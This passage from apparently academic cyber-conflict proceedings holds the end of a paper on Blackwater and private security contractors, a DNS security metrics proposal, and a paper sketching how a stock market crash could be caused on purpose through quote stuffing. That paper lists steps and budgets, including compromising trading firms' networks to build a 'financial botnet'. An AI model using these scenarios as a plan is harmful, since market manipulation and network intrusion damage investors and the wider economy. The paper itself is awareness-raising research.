increase their truth value. This has intensified power struggles over the production of knowledge on
PSCs. Currently, there seems to be no unanimity on the images - just that security contractors need to be
brought under better state supervision. In addition, it is improbable that the practice of producing PSCs
into the shared understanding mainly through scandals changes regardless of the source of truth claims.
With regard to private security contractors, one of the most successful practices used in information
management has been the deprivation of information. As the discussion related to the September 16 th
shooting testified, the US administration has not been keeping proper records PSCs and their operations,
not to mention publishing the records. It also required that security contractors abstain on public
commenting on incidents. However, congressional and public demands for openness pressured the
administration to re-evaluate its practices and brought more information available. The rising awareness
has also meant that PSCs are required to be better included in decision making. The binary category of
the armed forces - private security contractors is likely to remain strong in state related discussion on
PSCs, but as state agencies are not the only customers of PSCs it would be interesting to test the solidity
of the category in discussions on PSCs hired by, for example, private aid agencies or multinational
corporations operating in conflict zones. However, finding relevant information about these contracts is
difficult.
References
Foucault, M. (1998) The Will to Knowledge. The History of Sexuality: Volume One, Penguin Books, London.
― (2009) The Archeology of Knowledge, Routledge, Abingdon.
Harle, V. (2000) The Enemy with a Thousand Faces. The Tradition of the Other in Western Political Thought and
History, Praeger, Westport.
Huhtinen, A. and Rantapelkonen, J. (2002) Image Wars. Beyond the Mask on Information Warfare, Marshal of
Finland Mannerheim’s War Studies Fund, Saarijärvi.
Kunelius, R.; Noppari, E. and Reunanen, E. (2009) Median vallan verkoissa. University of Tampere, Tampere.
328

Mirva Salminen
Rantapelkonen, J. (2008) ”Informaatiosodan monet kasvot” in Raitasalo, J. and Sipilä, J. (eds.), Sota - Teoria ja
todellisuus. Näkökulmia sodan muutokseen, Finnish National Defence University, Department of Strategic and
Defence Studies, Helsinki. Series 1:24, pp. 63-87.
Ridell, S. (1994) Kaikki tiet vievät genreen: tutkimusretkiä tiedotusopin ja kirjallisuustieteen rajamaastossa. University
of Tampere, Tampere.
Rose, G. (2001) Visual Methodologies: An Introduction to the Interpretation of Visual Materials, Sage Publications
Inc, London.
Salminen, M. (2010) Struggle over outsourcing of the security functions of the state: The case of September 16, 2007
shooting in Baghdad, M.Soc.Sc. thesis, University of Tampere, Tampere.
The New York Times, news article: “U.S. Contractor Banned by Iraq over Shootings”, 18.09.2007.
The New York Times, news article:“U.S. Contractor Banned by Iraq over Shootings”, 18.09.2007.
The New York Times, news article: “Iraqi Report Says Guards for Blackwater Fired First”, 19.09.2007.
The New York Times, news article: “Maliki Alleges 7 Cases When Blackwater Killed Iraqis”, 20.09.2007a.
The New York Times, news article: “Armed Guards in Iraq Occupy a Legal Limbo”, 20.09.2007b.
The New York Times, news article: “Guards’ Shots Not Provoked, Iraq Concludes”, 21.09.2007.
The New York Times, news article: “Blackwater Resumes Guarding U.S. Envoys in Iraq”, 22.09.2007.
The New York Times, news article: “Security Firm Faces Criminal Charges in Iraq”, 23.09.2007.
The New York Times, news article: “Iraqi Premier Says Blackwater Shootings Challenge His Nation’s Sovereignty”,
24.09.2007.
The New York Times, news article: “House Panel and State Dept. Clash on Blackwater Inquiry”, 26.09.2007a.
The New York Times, news article: “Iraq Drafts Law on Security Companies”, 26.09.2006b.
The New York Times, news article: “Blackwater Tops All Firms in Iraq in Shooting Rate”, 27.09.2007.
The New York Times, news article: “State Dept. Tallies 56 Shootings Involving Blackwater on Diplomatic Guard
Duty”, 28.09.2007a.
The New York Times, news article: “Blackwater Role in Shooting Said to Include Chaos”, 28.09.2007b.
The New York Times, news article: “State Dept. Starts Third Review on Private Security in Iraq”, 29.09.2007.
The New York Times, news article: “Report Says Firm Tried Cover-ups After Shootings”, 02.10.2007.
The New York Times, news article: “Chief of Blackwater Defends His Employees”, 03.10.2007a.
The New York Times, news article: “From Errand to Fatal Shot to Hail of Fire to 17 Deaths”, 03.10.2007b.
The New York Times, op-ed columnists
The New York Times, news article: “Hired Gun Fetish”, Paul Krugman, 28.09.2007.
The New York Times, news article: “Sinking in a Swamp Full of Blackwater”, Maureen Dowd, 03.10.2007.
The New York Times, editorials
The New York Times, news article: “Subcontracting the War”, 01.10.2007.
The New York Times, news article: “Blackwater’s Rich Contracts”, 03.10.2007.
The New York Times, news article: “Iraqi Report Says Guards for Blackwater Fired First”, 19.09.2007.
The New York Times, news article: “Maliki Alleges 7 Cases When Blackwater Killed Iraqis”, 20.09.2007a.
The New York Times, news article “Armed Guards in Iraq Occupy a Legal Limbo”, 20.09.2007b.
The New York Times, news article “Guards’ Shots Not Provoked, Iraq Concludes”, 21.09.2007.
The New York Times, news article “Blackwater Resumes Guarding U.S. Envoys in Iraq”, 22.09.2007.
The New York Times, news article “Security Firm Faces Criminal Charges in Iraq”, 23.09.2007.
The New York Times, news article “Iraqi Premier Says Blackwater Shootings Challenge His Nation’s Sovereignty”,
24.09.2007.
The New York Times, news article “House Panel and State Dept. Clash on Blackwater Inquiry”, 26.09.2007a.
The New York Times, news article “Iraq Drafts Law on Security Companies”, 26.09.2006b.
The New York Times, news article “Blackwater Tops All Firms in Iraq in Shooting Rate”, 27.09.2007.
The New York Times, news article “State Dept. Tallies 56 Shootings Involving Blackwater on Diplomatic Guard Duty”,
28.09.2007a.
The New York Times, news article “Blackwater Role in Shooting Said to Include Chaos”, 28.09.2007b.
The New York Times, news article “State Dept. Starts Third Review on Private Security in Iraq”, 29.09.2007.
The New York Times, news article “Report Says Firm Tried Cover-ups After Shootings”, 02.10.2007.
The New York Times, news article “Chief of Blackwater Defends His Employees”, 03.10.2007a.
The New York Times, news article “From Errand to Fatal Shot to Hail of Fire to 17 Deaths”, 03.10.2007b.
The New York Times, news article The New York Times, op-ed columnists
The New York Times, news article “Hired Gun Fetish”, Paul Krugman, 28.09.2007.
The New York Times, news article “Sinking in a Swamp Full of Blackwater”, Maureen Dowd, 03.10.2007.
The New York Times, editorials
The New York Times, news article “Subcontracting the War”, 01.10.2007.
The New York Times, news article “Blackwater’s Rich Contracts”, 03.10.2007.
329

330

Non
Academic
Papers
331

332

A Proposal for Domain Name System (DNS) Security Metrics
Framework
Andrea Rigoni and Salvatore Di Blasi
Global Cyber Security Center, Rome, Italy
andrea.rigoni@gcsec.org
salvatore.diblasi@gcsec.org
Abstract: The Domain Name System (DNS) is a fundamental and critical building block of the Internet. Not only,
DNS represents one of the most critical services of information infrastructures, and the strong interdependency
between critical infrastructures relying on information and communication technology makes DNS a likely, disrupting
target in case of cyber conflict. Critical infrastructures are no longer independent from the Internet networks:
electricity plants, telecommunications services, transportation systems, banks and financial institutions heavily rely
on Information and Communication Technology (ICT). New risk scenarios for critical infrastructure protection are
expected, in that newer threats propagate through the Internet networks and exploit Internet infrastructure
vulnerabilities, making such threats as cyber espionage, cyber conflict and cyber terrorism a likely possibility every
government should consider in its national security agenda. DNS is vulnerable to a series of threat agents, and these
vulnerabilities might be exploited by coordinated groups of attackers to produce damages to national critical assets.
A more secure DNS in terms of technology, processes, policy making and organizational structures is needed. The
proposal presented in this paper represents a work in progress, whose main objective consists in the development of
an accepted metric framework for DNS security and stability: this will be accomplished through a deep state-of-theart
analysis of current DNS metrics and KPIs, the proposal of a newer set of KPIs and consequential sharing of the
results with the DNS community. We believe the definition and collection of these metrics will pave the way to the
empirical definition of a DNS stability baseline, leading to the establishment of best practices, standards and
acceptable service levels for a consolidated overarching DNS security policy making framework and raising
awareness on DNS vulnerabilities and threats outside DNS community.
Keywords: DNS security, security policy, public key infrastructure, security, critical national infrastructure protection
1. DNS and critical (information) infrastructure protection
DNS security and stability (i.e. a guaranteed level of accuracy, performance and dependability) have a
direct and strong impact on the performance and dependability of nearly all Internet services and
applications, which constitute a foundation for high performance and scalable services computing,
increasing requirements for higher performance and availability.
Critical infrastructures are no longer independent from the Internet networks: electricity plants,
telecommunications services, transportation systems, banks and financial institutions heavily rely on
Information and Communication Technology (ICT); moreover, corporate networks of critical sectors
operators are often interconnected with internal control and monitoring systems, in order to make data
available for business intelligence needs.
This draws new risk scenarios in that newer threats propagate through the Internet networks and exploit
Internet infrastructure vulnerabilities, making such threats as cyber conflict a likely possibility for any
government.
DNS, along with routing protocols, constitutes the core functioning service of the Internet infrastructure
and with the adoption of new internet infrastructures technologies, such as IPv6, the need for DNS
security and stability can be considered an even more critical goal affecting the whole cyber community.
2. DNS security issues and possible solutions
As one of the first developed systems for the internet infrastructure, DNS has been designed to be
performing and scalable rather than secure.
Nowadays, three major categories of vulnerabilities have been identified for DNS: operating
vulnerabilities, process vulnerabilities and policy vulnerabilities.
DNS is susceptible of operating vulnerabilities which can undermine its availability, through Denial of
Service (Dos) and Distributed Denial of Service(DDoS) attacks, and integrity, via spoofing and man-inthe-middle
attacks, which can lead to cache poisoning and more generally forged responses to client
333

Andrea Rigoni and Salvatore Di Blasi
resolvers. Root operators, Country Code Top Level Domains (ccTLD) and General Top Level Domains
(gTLD) operators have often been targets for this kind of attacks in the recent past.
DNS registration services have been found as an advantageous entry-point for phishing campaigns and
botnet infrastructures.
Last but not least, DNS core functions are operated through the contributions of root server operators,
TLD registries and registrars: these entities operate within their own defined policy frameworks and don’t
have any specific obligations and liabilities whenever disruptions or impossibility to perform their
functions should happen.
DNS Security Extensions (DNSSEC) has been introduced as a security extension to the DNS protocol,
finally providing authentication and integrity assurance for DNS data through introduced cryptographic
mechanisms which allow to sign DNS records.
Despite of the commitment of the DNS community in gradually adopting DNSSEC, there are some open
challenges which have yet to be addressed:
DNSSEC could still be vulnerable to replay attacks due to misconfigured settings on timestamps
validity for signatures and their relative cached counterparts;
there still exists some open issues on Public Key Infrastructure (PKI) processes, in particular
regarding DNS keys lifetime, rollover and verification, especially if considering the interaction
between DNSSEC-served zones and standard DNS zones;
a lack of customer demand and missing DNSSEC expertise constitute impeding factors for DNSSEC
wide adoption;
There is a general understanding within DNS community that an overarching collaboration framework
is needed, in order to guarantee dedicated organizational structures and agreed upon DNS security
policies.
DNS is vulnerable to a series of targeted threat agents, and these vulnerabilities might be likely exploited
by coordinated groups of attackers to produce damages to national critical assets.
To give an example, successful attacks producing forged DNS responses can redirect users’ requests
towards infected sites, thus allowing the attackers to install malware applications on the user machines
and then propagate through enterprise networks, exploiting misconfigured firewalls, Intrusion Detection
Systems (IDS) and Intrusion Prevention Systems (IPS) and operating systems vulnerabilities.
This is critical in case of propagation between corporate Local Area Networks (LAN) and internal control
systems of electricity plants or nuclear facilities: the Stuxnet operation, though not producing physical
damages or life losses, proved capable to control and alter the behavior of single field devices; the next
step when electricity, water supply, oil and gas operators, banking institutions, transportation control
systems, telecommunication and public health services will be affected is not necessarily that far.
It becomes thus evident that, in order to improve the security, stability and resiliency of the DNS, there is
a need for:
Dedicated activities to define consolidated processes for DNS Public Key Infrastructure (PKI)
Definition and consolidation of standards, system-wide metrics and acceptable service levels
A large-scale simulation framework to help DNS engineering in what-if and impact analysis of risk
scenarios
Definition of a framework for information sharing among DNS ecosystem players
DNSSEC capacity building activities, dissemination and training for involved operators
3. Our proposal: A DNS security metrics framework
In DNS literature there are numerous studies that characterize DNS traffic (Castro, Wessels, Fomenkov,
Claffy 2008; DNS-OARC 2006) and are specifically focused on the performance of the DNS (Ager,
Dreger, Feldmann 2006; Ager, Mühlbauer, Smaragdakis, Uhlig 2010; Huang, Holt, Wang, Greenberg, Jin
Li, Ross 2010; Jung, Sit, Balakrishnan, Morris 2002; Kolkman 2005; Liston, Srinivasan, Zegura 2002).
These research results build a base of knowledge for DNS engineers involved in the design of solutions
334

Andrea Rigoni and Salvatore Di Blasi
to improve DNS performance and scalability. Such studies can also provide a knowledge base for DNS
policy making.
The fast and frequently unpredictable evolution of Internet applications and technologies has a direct
impact on the rapid growth of Internet service demand. This growth necessitates up-to-date and on-going
research and benchmarking of DNS security and stability.
To achieve the goal of understanding and benchmarking DNS security and stability, it is fundamental to
develop new and standard metrics for what stability of the DNS actually means. While the DNS system
has operated in a generally reliable and robust fashion for decades, this notion of stability is not
empirically specified, and no way currently exists to specifically assess the stability impacts of
application-driven query volume increases, or technology changes such as DNSSEC. Various studies
(Ager, Dreger, Feldmann 2006; CommunityDNS 2010; Kolkman 2005) have assessed the specific
response to payload increases, but these studies have not provided the ability to correlate the results
with system-wide stability metrics.
The goal of this proposed study is to create a set of metrics that establish a baseline for DNS stability and
security by:
Performing a state-of-the-art study of measurement techniques and metrics used in DNS stability and
security evaluation as well as in DNS policy making;
Comparing the effectiveness of existing metrics and Key Performance Indicators (KPI) in relation to
real data;
Identifying and proposing for standardization a modular/layered framework of measurement
techniques, metrics and KPIs to support the design, engineering and governance of the DNS
infrastructure;
Ensuring transparency with respect to DNS research community in inspecting the measurement data,
challenging any results, and building further analyses.
4. Expected outcomes and benefits
We believe that the definition and collection of these metrics will pave the way to the empirical definition
of a DNS stability baseline.
While fostering a stronger debate about overall systemic definition of stability, this quantitative baseline
will establish an important benchmark, setting up the basis for the definition of a framework for DNS
benchmarking and consistent DNS traffic trend analysis.
Cooperation with DNS community is fundamental to attain a global and cross-border scope for the
research activities.
We envisage this will also help to lead to the establishment of standards and acceptable service levels
for a consolidated overarching DNS security policy making framework.
In this way, the debate will open up to new research opportunities for academic partners, international
standard bodies, internet governance organizations, DNS operators, vendors and researchers.
5. Conclusions
The Internet constitutes a critical infrastructure on its own; at its core functioning, DNS security
represents a global issue in the Internet ecosystem.
In the age of cyber warfare, international debate is open about the applicability of international
humanitarian law in case of cyber conflict: in order to preserve and protect core humanitarian services
such as telecommunications and emergencies in case of cyber conflict, it would be needful to promote
studies and analysis over DNS security as a critical internet service, in order to eventually put in place a
framework of policies and organizational structures to guarantee better DNS security, stability and
resiliency.
A consolidated security metrics framework for DNS will help to start getting a big picture of the DNS
health status, identifying major issues and vulnerabilities as well as setting new policies: by having in
335

Andrea Rigoni and Salvatore Di Blasi
place defined metrics, it will be possible to perform more intensive simulation-driven predictive analysis of
security impact of DNS over critical infrastructure services.
As a core service of the Internet infrastructure, DNS would likely be an attack target should a cyber
conflict occurr, and this is the main reason why we believe it is fundamental to put in place solid defense
mechanisms for its protection.
References
Ager B., Dreger H., Feldmann A. (2006) “Predicting the DNSSEC overhead using DNS traces”, IEEE ISS 2006
Ager B., Mühlbauer W., Smaragdakis G., Uhlig S. (2010) “Comparing DNS Resolvers in the Wild”, Proceedings of
Internet Measurement Conference January 2011
Castro S., Wessels D., Fomenkov M., Claffy K. (2008) “A day at the root of the internet”, SIGCOMM Comput.
Commun. Rev. 38, 5 pp41-46
CommunityDNS, (2010) “Performance testing of BIND, NSD and CDNS platforms on identical hardware”
DNS-OARC “The Day in the life of Internet (DITL) project”
Huang C., Holt N., Wang Y.A., Greenberg A., Jin Li, Ross K.W. (2010), “A DNS reflection method for global traffic
management”, Proceedings of the 2010 USENIX conference on USENIX annual technical conference (USENIX
ATC'10). USENIX Association, Berkeley, CA, USA, 20-20
Jung J., Sit E., Balakrishnan H., Morris R. (2002) “DNS performance and the effectiveness of caching”, IEEE/ACM
Trans. Netw. 10, pp589-603
Kolkman O.M. (2005), “Measuring the resource requirements of DNSSEC”, RIPE NCC Tech. Report RIPE-352
Liston R., Srinivasan S., Zegura E. (2002) “Diversity in DNS performance measures”, Proceedings of the 2nd ACM
SIGCOMM Workshop on Internet measurment (IMW '02). ACM, New York, NY, USA, pp 19-31.
336

Work
in
Progress
337

338

Malicious Flash Crash Attacks by Quote Stuffing: This is the
way the (Financial) World Could end
Robert Erra
Équipe S&IS, Esiea Paris, France
erra@esiea.fr
Abstract: Cybercrime and cyberterrorism use computers (well, softwares and networks) to attack targets like critical
infrastructures. Computers, softwares and networks are necessary tools for a cyberattack but can also of course be
targets. We propose here to describe a new form of cyberterrorism (or cybercrime) attack, theoretical but with a high
probability of realization: the cyberattack on the stock exchange market of some countries but with legal
cyberweapons. Consequences of such an attack could be devastating for the financial and the non financial world.
How is such an attack possible ? Well, at the New York Stock Exchange, May 6th 2010, an astonishing fact has
happened: all financial transactions during 20 minutes have been purely “deleted”. This is now called the Flash
Crash. All details are not clearly understood, it seems that the so called “quote stuffing” (or stub quotes sometimes)
used in conjunction with High Frequency Trading (HTF) is at the heart of this accidental incident. We have to point
out that experts from SEC do not agree with this hypothesis. We propose in this paper here to describe a malicious
version of the flash crash, this is a new cyberweapon that can attack a new target: Stock Exchanges places. More
precisely, we propose to see this financial incident as it really is : a Denial Of Services (DOS) of a very new type that
we will call a Denial Of Financial Services (DFOS). We remind that a DOS classical attack is simple to do and can be
devastating, so it seems for the DFOS. The basic idea of the scenario of our malicious flash crash attack (MFCA) is
simple: we propose to mimic the true flash crash of the New York Stock Exchange. So, a group of cyberterrorists,
with just money and computers, following the mechanisms of the MFCA, could create an artificial but truly
devastating flash crash. An quick evaluation of the legality of each step of our malicious flash crash attack shows that
if the quote stuffing is considered as legal (the status of it is a little bit unclear) then the MFCA is absolutely legal. We
propose also a illegal version of the MFCA. Is it possible to design a countermeasure against the MFCA ?
Unfortunately, as long as HTF and quote stuffing will be legal, our scenarii are highly plausible, both the legal and the
illegal version, and they are not so difficult if you have enough money, or enough cybercriminals.
Keywords: flash crash, quote stuffing, cyberwarfare, cyberterrorism, cyberattack
1. Introduction
Cyberwarfare, cyberterrorism and cybercrime are not so old terms and a lot of definitions have been
given for these terms. We just remind the “FBI” definition of cyberterrorism (UDA 2009) which has been
first proposed by M. Pollit in 1998: “… any premeditated, politically motivated attack against information,
computer systems, computer programs, and data which results in violence against non-combatant targets
by sub-national or national groups or clandestine agents”.
Computers, softwares and networks are necessary tools for a cyberattack but can also of course be
targets (Filiol 2009).
So, is a cyberattack on the stock exchange market of some countries a form of cyberterrorism? This
question (UDA 2009) has a complex answer; we give here just a quick answer: yes!
We propose a new scenario, theoretical but with a high probability of realization.
The targets are stock exchanges places and, through them, companies, especially financial companies
that try to do profits only by “playing” with financial softwares. Of course, consequences of such an attack
could be devastating for the financial world and, of course, unfortunately also for the non financial world.
Our basic idea comes from the events at the New York Stock Exchange (NYSE), May 6th 2010. This day,
an astonishing fact has happened: quite all financial transactions during 20 mns have been purely
“deleted”. This is now called the Flash Crash. All details are not clearly understood, the preliminary report
(SEC 2010a) and the final report (SEC 2010b) published by the SEC about the flash crash gives a lot of
details but no clear convincing explanations of how to avoid in the future such a flash crash. It seems that
the so called “quote stuffing” used in High Frequency Trading (HTF) is at the heart of this accidental
incident.
We propose in this paper to investigate possibilities to create a malicious version of the Flash Crash, that
we will call the malicious flash crash attack (MFCA). This is a new cyberweapon that can attack a new
target: stock exchanges places. More precisely, we propose to see this financial incident as it really is : a
339

Robert Erra
Denial Of Services (DOS) of a very new type that we will call a Financial Electronic Denial Of Services
(FEDoS). We remind that a DOS classical attack is simple to do and can be devastating, so it seems for
the FEDoS.
The basic idea of the scenario of our MFCA is simple: we propose to mimic the true flash crash of the
New York Stock Exchange. So, a group of cyberterrorists, with just money and computers, following the
mechanisms of the FCA, could create an artificial but truly devastating flash crash.
We present here:
A quick investigation of how such a event has happened
Some arguments to show it is really possible to mime the flash crash to use it as a new weapon.
An evaluation of the legality of each step of a malicious flash crash attack shows that if the quote stuffing
is considered as legal (the status of it is a little bit unclear) then the MFCA is absolutely legal. We will
present an illegal version of the MFCA. As a conclusion we will propose some topics for future research
on this new cyberattack which is by now a theoretical scenario but with a high probability of realization.
For example: is it possible to design “signatures” for quote stuffing techniques, like viruses and malwares
signatures based on specific patterns and used by quite all antivirus softwares, to identify them in real
time? This question has very close connections to questions studied in antivirology research.
2. Some definitions : High frequency trading and quote stuffing
Following Aldridge (Aldridge 2009) and Wikipedia (Wikipedia 2011), High Frequency Trading (HTF) is the
execution of computerized trading strategies characterized by unusually short position-holding periods.
This is now possible because of the low cost of electronic trading. HFT uses quantitative investment
softwares to hold short-term, or very short terms, positions in equities, options, futures, currencies, and
other financial instruments that possess electronic trading capability. HTF seems legal (SEC 2010a,
2010b) and unfortunately quote stuffing is also legal; What is quote stuffing ? Generate a large number of
orders and cancel quickly them (in a micro-seconds sometime), then you are doing quote stuffing. We
propose a new definition for quote stuffing: a Financial Electronic Denial of Service (FEDoS). This not so
exaggerated; we can find for example in the Nanex’report : “… this is an extremely disturbing
development, because as more HFT systems start doing this, it is only a matter of time before quotestuffing
shuts down the entire market from congestion”.
3. The flash crash scenario
The Flash Crash begins in the US Stock Exchange system at 14h 42mn 46s, May 6, 2010. Some
software, following the rules of the High Frequency Trading begun to do strange things. In a few minutes
(SEC 2010a, SEC 2010b):
Some quote counts have changed 5000 times in a second;
Some trades were executed at prices of a penny (0.01$) or less like the Accenture Company;
Some trades were executed at a price of 100 000 $.
Eventually, after a few hours, an astonishing fact has happened: quite all financial transactions from
14h40 to 15h have been purely “deleted”. This is now called the flash crash. All details are not clearly
understood and the final SEC report 1 about the flash crash is still waited. It seems that the so called
“quote stuffing” is at the heart of this accidental incident. May, 15 th 2010, SEC Chairman has said “we're
outgunned by market supercomputers”. Technically this is not exactly true. The problems are HTF
algorithms and the fact that quote stuffing is not illegal at all.
4. Two malicious flash crash attacks by quote stuffing
What do we need to conduct a malicious flash crash attack ? We nned Softwares for HTF, High Speed
Networks, and money. We propose two scenarii: a legal one and an illegal one. Of course, we can
imagine a third scenario: a malicious flash crash attack partly legal and partly illegal. We have to point out
1 An example of what we can find in (SEC 2010b) :
“Still lacking sufficient demand from fundamental buyers or cross-market arbitrageurs, HFTs
began to quickly buy and then resell contracts to each other – generating a “hot-potato”
volume effect as the same positions were rapidly passed back and forth. Between 2:45:13 and
2:45:27, HFTs traded over 27,000 contracts, which accounted for about 49 percent of the total
trading volume, while buying only about 200 additional contracts net.
340

Robert Erra
that if we present these scenarii as a cyberattack, it is possible to imagine that someone, a
cyberspeculator, could try such an attack only with the goal to win money. This theoretical flash crash
attack by quote stuffing could really be a practical “Financial Weapon of Mass Destruction”. This financial
attack would still be cyberterrorism.
4.1 The (legal) malicious flash crash attack
We just propose to mimic the true scenario:
Create some (legal and official) companies of HTF in different countries, seemingly independent.
Wait for some months or years, the companies really work.
Wait for a “calm day” at NYSE, July 3 is a good candidate.
Sent a lot of quote stuffing orders, from all the companies just 5 seconds before the closure.
It is difficult to estimate how much money is necessary to make such a scenario efficient, but it seems
reasonable to say:
With 100 million dollars: the scenario is possible, but highly difficult;
With 1 billion dollars: the scenario is highly possible, less difficult ;
With 10 billion dollars: we can do it without doubt.
Unfortunately, HTF is legal, so we don’t see how this scenario could be stopped.
4.2 The (illegal) malicious flash crash attack
We can also imagine the following illegal scenario, forgetting the creation of legal companies:
Engage a team of experienced cybercriminals.
Ask them to take the control of the local networks of some HTF companies.
Create a financial botnet.
Use the botnet to follow the legal scenario.
HTF can really become a new “Financial Weapon of Massive Destruction”.
5. Conclusion
As long as HTF and quote stuffing will be legal (SEC 20010a, 2010b), our two scenarii are highly
plausible, both the legal and the illegal version, and they are not so difficult if you have enough money, or
enough cybercriminals. Is there a countermeasure against malicious flash crack attacks ? Well, as long
as HTF and quote stuffing will be legal, it is difficult to imagine such a countermeasure. If someday quote
stuffing becomes illegal then we could imagine the following question which is in itself a roadmap for
future research: is it possible to design “signatures” for quote stuffing techniques, like viruses and
malware signatures based on specific patterns and used by quite all antivirus softwares, to identify them
in real time? This difficult question has very close connections to questions studied in antivirology
research. So, let us hope we will not need an antiHFT or antiquotestuffing software.
References
Aldridge, I., (2009), High-Frequency Trading: A Practical Guide to Algorithmic Strategies and Trading Systems,
Wiley.
Nanex’s Report (2010) June 18, part 4, http://www.nanex.net/20100506/FlashCrashAnalysis_Part4-1.html
Filiol, E. (2009) “Operational aspects of cyberwarfare or cyber-terrorism attacks: what a truly devastating attack could
do”, ECIW 2009, Liboa, http://www.esiea-recherche.eu/data/eciw09.pdf
SEC (2010a) Report of the staffs of the CFTC and SEC to the Joint Advisory Committee on Emerging Regulatory
Issues, May 18,, http://www.sec.gov/sec-cftc-prelimreport.pdf
SEC (2010b) Report of the staffs of the CFTC and SEC to the Joint Advisory Committee on Emerging Regulatory
Issues, September 30, http://www.sec.gov/news/studies/2010/marketevents-report.pdf .
Uda, 2009, R. T., Cybercrime, Cyberterrorims and Cyberwarfare, Crime, Terror and War without Conventional
Weapons, Xlibris.
Wikipedia (2011) “High-frequency trading”, http://en.wikipedia.org/wiki/High-frequency_trading
341